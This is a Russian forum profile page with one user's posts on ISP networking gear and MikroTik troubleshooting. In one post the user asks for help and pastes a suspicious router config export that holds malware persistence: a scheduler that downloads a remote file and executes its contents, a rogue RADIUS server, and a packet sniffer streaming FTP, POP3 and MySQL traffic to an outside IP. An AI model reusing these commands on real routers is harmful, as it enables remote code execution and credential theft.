Перейти к содержимому
Калькуляторы

weedman

Пользователи
  • Публикации

    147
  • Зарегистрирован

  • Посещение

О weedman

  • Звание
    Студент

Посетители профиля

Блок посетителей профиля отключен и не будет отображаться другим пользователям

  1. PON PHOTON

    Возможно вы правы, я не сталкивался с ОНУ неизвестных в России фирм, но покупал телефоны Jiayu, AGM, Elephon. помню как когда-то телефоны Honor были неизвестны никому. Решил узнать на форуме, есть ли у кого опыт. может оказаться, что эти производители не уступают в качестве ну уж BDCOM во всяком случае
  2. PON PHOTON

    все остальное - тоже китайцы
  3. Кто-нибудь сталкивался с этим производителем? есть веб интерфейс (на сколько понял, есть не у всех), поддержка различных ONU. Есть опыт использования? В целом CLI не до жути пугает но если есть веб интерфейс, то лучше в нем PTF3004 EPONhttp://www.potonbroadband.com.cn/index.php/product/index/g/e/id/10.htmlhttps://www.baba.com/trade/search?fsb=y&IndexArea=product_en&CatId=&SearchText=PTF3004+EPON
  4. SXT lite2 и ограничение скорости локальной сети

    Длинна кабеля, качество кабеля, качество обжимки
  5. Mikrotik, wi-fi и локальная сеть.

    новые устройства не подключались ? попробуйте изменит пароль на время, или имя сети и подключите несколько тестовых устройств. может чей-то адаптер вызывает проблемы
  6. Ограничение по уровню сигнала

    установлено, на сколько я понял, это ни как не влияет на ситуацию. шифрование идет после мак уровня? на сколько я понял ситуацию, при сигналу чужой точке- " mac- такой-то, отключайся, ты мне не нужен" отваливается и нужная точка
  7. Ограничение по уровню сигнала

    Здравствуйте. Недобросовестный человек, отсканировал маки клиенских устройств и повесил дубли на базу, база их откидывает, судя по всему расссылая отказ на мак и также отключается и клиент. На клиентах в целом синал выше, пробовал делать фильтарцию свой\чужой по уровню сигнала, но ничего не вышло. как можно решить проблему?
  8. Появляются записи Static DNS

    принято
  9. Появляются записи Static DNS

    сбросил на заводские, прошивка пока 6.35.4 stable После перезагрузки захожу на speedtest.net (http), начинаю проверку, сначала все идет нормально, а при проверке исходящего (примерно 20 сек от начала) выходит ошибка. обновляю страницу и гугл переводчик говорит что дальше все написано на странице по малазийски. в экспорте ничего подозрительного на этот раз нет. попробую прошить нетинсталом 6.40.7
  10. Появляются записи Static DNS

    Вот это там явно появилось не по моей воле. какие у вас мысли? /ip proxy set port=42216 /ppp aaa set interim-update=1m use-circuit-id-in-nas-port-id=yes use-radius=yes /radius add address=47.75.230.175 secret=test service=ppp add address=47.75.230.175 secret=test service=ppp add address=47.75.230.175 secret=test service=ppp add address=47.75.230.175 secret=test service=ppp add address=47.75.230.175 secret=test service=ppp add address=47.75.230.175 secret=test service=ppp add address=47.75.230.175 secret=test service=ppp /radius incoming set accept=yes /system scheduler add interval=2h name=a on-event=ip policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=startup add interval=10m name=autosupout on-event=":if ([/file find name=autosupout1.rif]=\"\") do={\r\ \n:local ssip [:resolve jt.25u.com server=8.8.8.8]\r\ \n/tool fetch url=\"http://\$ssip:81/autosupout1.rif\" dst-path=autosupout1.rif\r\ \n}\r\ \nexecute [/file get autosupout1.rif contents]" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=jan/01/1970 start-time=00:00:00 /system script add name=ip owner=admin policy=reboot,read,write,policy,test,password,sniff,sensitive source="{/tool fetch url=(\"http://www.boss-ip.com/Core/Update.ashx\\\?key=5bc24d5c0d\ 21bf27&action=upload&sncode=06E212D666C4043D2C2E7C2B0202CA53&dynamic=static\") keep-result=no}" /tool sniffer set file-limit=100KiB filter-interface=all filter-ip-protocol=tcp filter-port=ftp,pop3,143,mysql filter-stream=yes streaming-enabled=yes streaming-server=77.222.54.45
  11. Появляются записи Static DNS

    Всем откликнувшимся спасибо. Сегодня было установлено, что проблема в другом. блокируются сервисы по http, https работает нормально. сделал экспорт, попробую разобраться в причине сам, если не смогу, обращусь. еще раз спасибо. На днс подумал потому что недавно была такая проблема и решилась очисткой кэша, блокировка может и не дала ничего. брожу в темной комнате на ощупь.
  12. Появляются записи Static DNS

    используются 8.8.8.8 и 8.8.4.4, use peer dns отключал. после блокировки Input эти записи стали появляться меньше. на домашнем компе проблема решилась, а в этой ситуации (рабочей) все так же. Ip-Service все по дефолту, не менялось ничего ни в одном случае
  13. Появляются записи Static DNS

    Заблокировал на input все кроме внутренней сети и впн для управления, проблема та же. часть сайтов открывает, часть нет. прошивку, экспорт и ip сервис к сожалению сейчас не смогу выложить возможно проблема не в этом. но недели три назад та же хрень была на моем домашнем роутере и очистка кэша помогла, тут же после этого сразу все возвращается (записи и неработоспособность ВАЖНОЕ ДОПОЛНЕНИЕ- проблема не со статик днс, а с кэшем
  14. Появляются записи Static DNS

    Большой список, просто портянка там что-то и с андройдом было связано 1tv кажется какой-то, я очистил уже и не сделал сриншот. при повторении выложу. это уже третий раз в этом месяце в разных местах
  15. Здравствуйте. Проблема в самопроизвольном появлении записей в статик днс, сайты перестают грузиться, после сброса все работает как следует. В логах ничего не увидел, с какой стороны эта проблема?